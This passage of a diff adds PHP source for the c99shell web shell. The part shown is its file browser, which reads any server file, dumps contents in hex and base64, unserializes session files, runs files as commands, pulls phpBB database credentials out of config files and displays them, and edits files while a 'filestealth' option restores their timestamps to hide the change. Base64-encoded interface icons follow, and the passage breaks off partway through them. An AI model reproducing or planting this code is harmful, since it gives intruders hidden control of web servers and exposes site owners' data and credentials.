    ";} + } + else + { + $r = @file_get_contents($d.$f); + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( + array("","info"), + array("","html"), + array("","txt"), + array("Code","code"), + array("Session","phpsess"), + array("","exe"), + array("SDB","sdb"), + array("","img"), + array("","ini"), + array("","download"), + array("","notepad"), + array("","edit") + ); + echo "Viewing file:     ".$f." (".view_size(filesize($d.$f)).")      ".view_perms_color($d.$f)."
    Select action/file-type:
    "; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " ".$t[0]."";} + elseif ($t[1] == $ft) {echo " ".$t[0]."";} + else {echo " ".$t[0]."";} + echo " (+) |"; + } + echo "
    "; + if ($ft == "info") + { + echo "Information:"; + if (!$win) + { + echo "
    Path ".$d.$f."
    Size ".view_size(filesize($d.$f))."
    MD5 ".md5_file($d.$f)."
    Owner/Group "; + $ow = posix_getpwuid(fileowner($d.$f)); + $gr = posix_getgrgid(filegroup($d.$f)); + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + } + echo "
    Perms".view_perms_color($d.$f)."
    Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
    Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."

    "; + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));} + else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000
    "; + $a1 = ""; + $a2 = ""; + for ($i=0; $i";} + $a1 .= "
    "; + $a2 .= "
    "; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."
    ";} + echo "
    ".$a0."".$a1."".$a2."

    "; + } + $encoded = ""; + if ($base64 == 1) + { + echo "Base64 Encode
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "Base64 Encode + Chunk
    "; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "Base64 Encode + Chunk + Quotes
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "
    "; + } + if (!empty($encoded)) + { + echo "

    "; + } + echo "HEXDUMP: [Full] [Preview]
    Base64: +
    [Encode +[+chunk +[+chunk+quotes +[Decode +

    "; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {c99shexit();} + } + elseif ($ft == "txt") {echo "

    ".htmlspecialchars($r)."
    ";} + elseif ($ft == "ini") {echo "
    "; var_dump(parse_ini_file($d.$f,TRUE)); echo "
    ";} + elseif ($ft == "phpsess") + { + echo "
    "; 
    +   $v = explode("|",$r); 
    +   echo $v[0]."
    "; + var_dump(unserialize($v[1])); + echo "
    "; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "Execute file:

    Display in text-area
    "; + } + elseif ($ft == "sdb") {echo "
    "; var_dump(unserialize(base64_decode($r))); echo "
    ";} + elseif ($ft == "code") + { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "phpBB configuration is detected in this file!
    "; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "Connect to DB

    ";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} + echo "Parameters for manual connect:
    "; + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
    ";} + echo "

    "; + } + } + echo "
    "; + if (!empty($white)) {@ob_clean();} + highlight_file($d.$f); + if (!empty($white)) {c99shexit();} + echo "
    "; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".filesize($d.$f)); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo $r; + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + $inf = getimagesize($d.$f); + if (!$white) + { + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "
    Size: "; + $sizes = array("100","50","20"); + foreach ($sizes as $v) + { + echo ""; + if ($imgsize != $v ) {echo $v;} + else {echo "".$v."";} + echo "%  "; + } + echo "

    "; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "Can't write to file!";} + else + { + echo "Saved!"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "
      
    "; + } + elseif (!empty($ft)) {echo "
    Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
    ";} + else {echo "
    Unknown extension (".$ext."), please, select type manually.
    ";} + } +} +} +else +{ + @ob_clean(); + $images = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". +"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". +"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". +"yAsokBkQADs=", +"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". +"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_asp"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_mp3"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMAgEAOw==", +"ext_cmd"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_cpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". +"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". +"Eq7YrLDE7a4SADs=", +"ext_ini"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_diz"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". 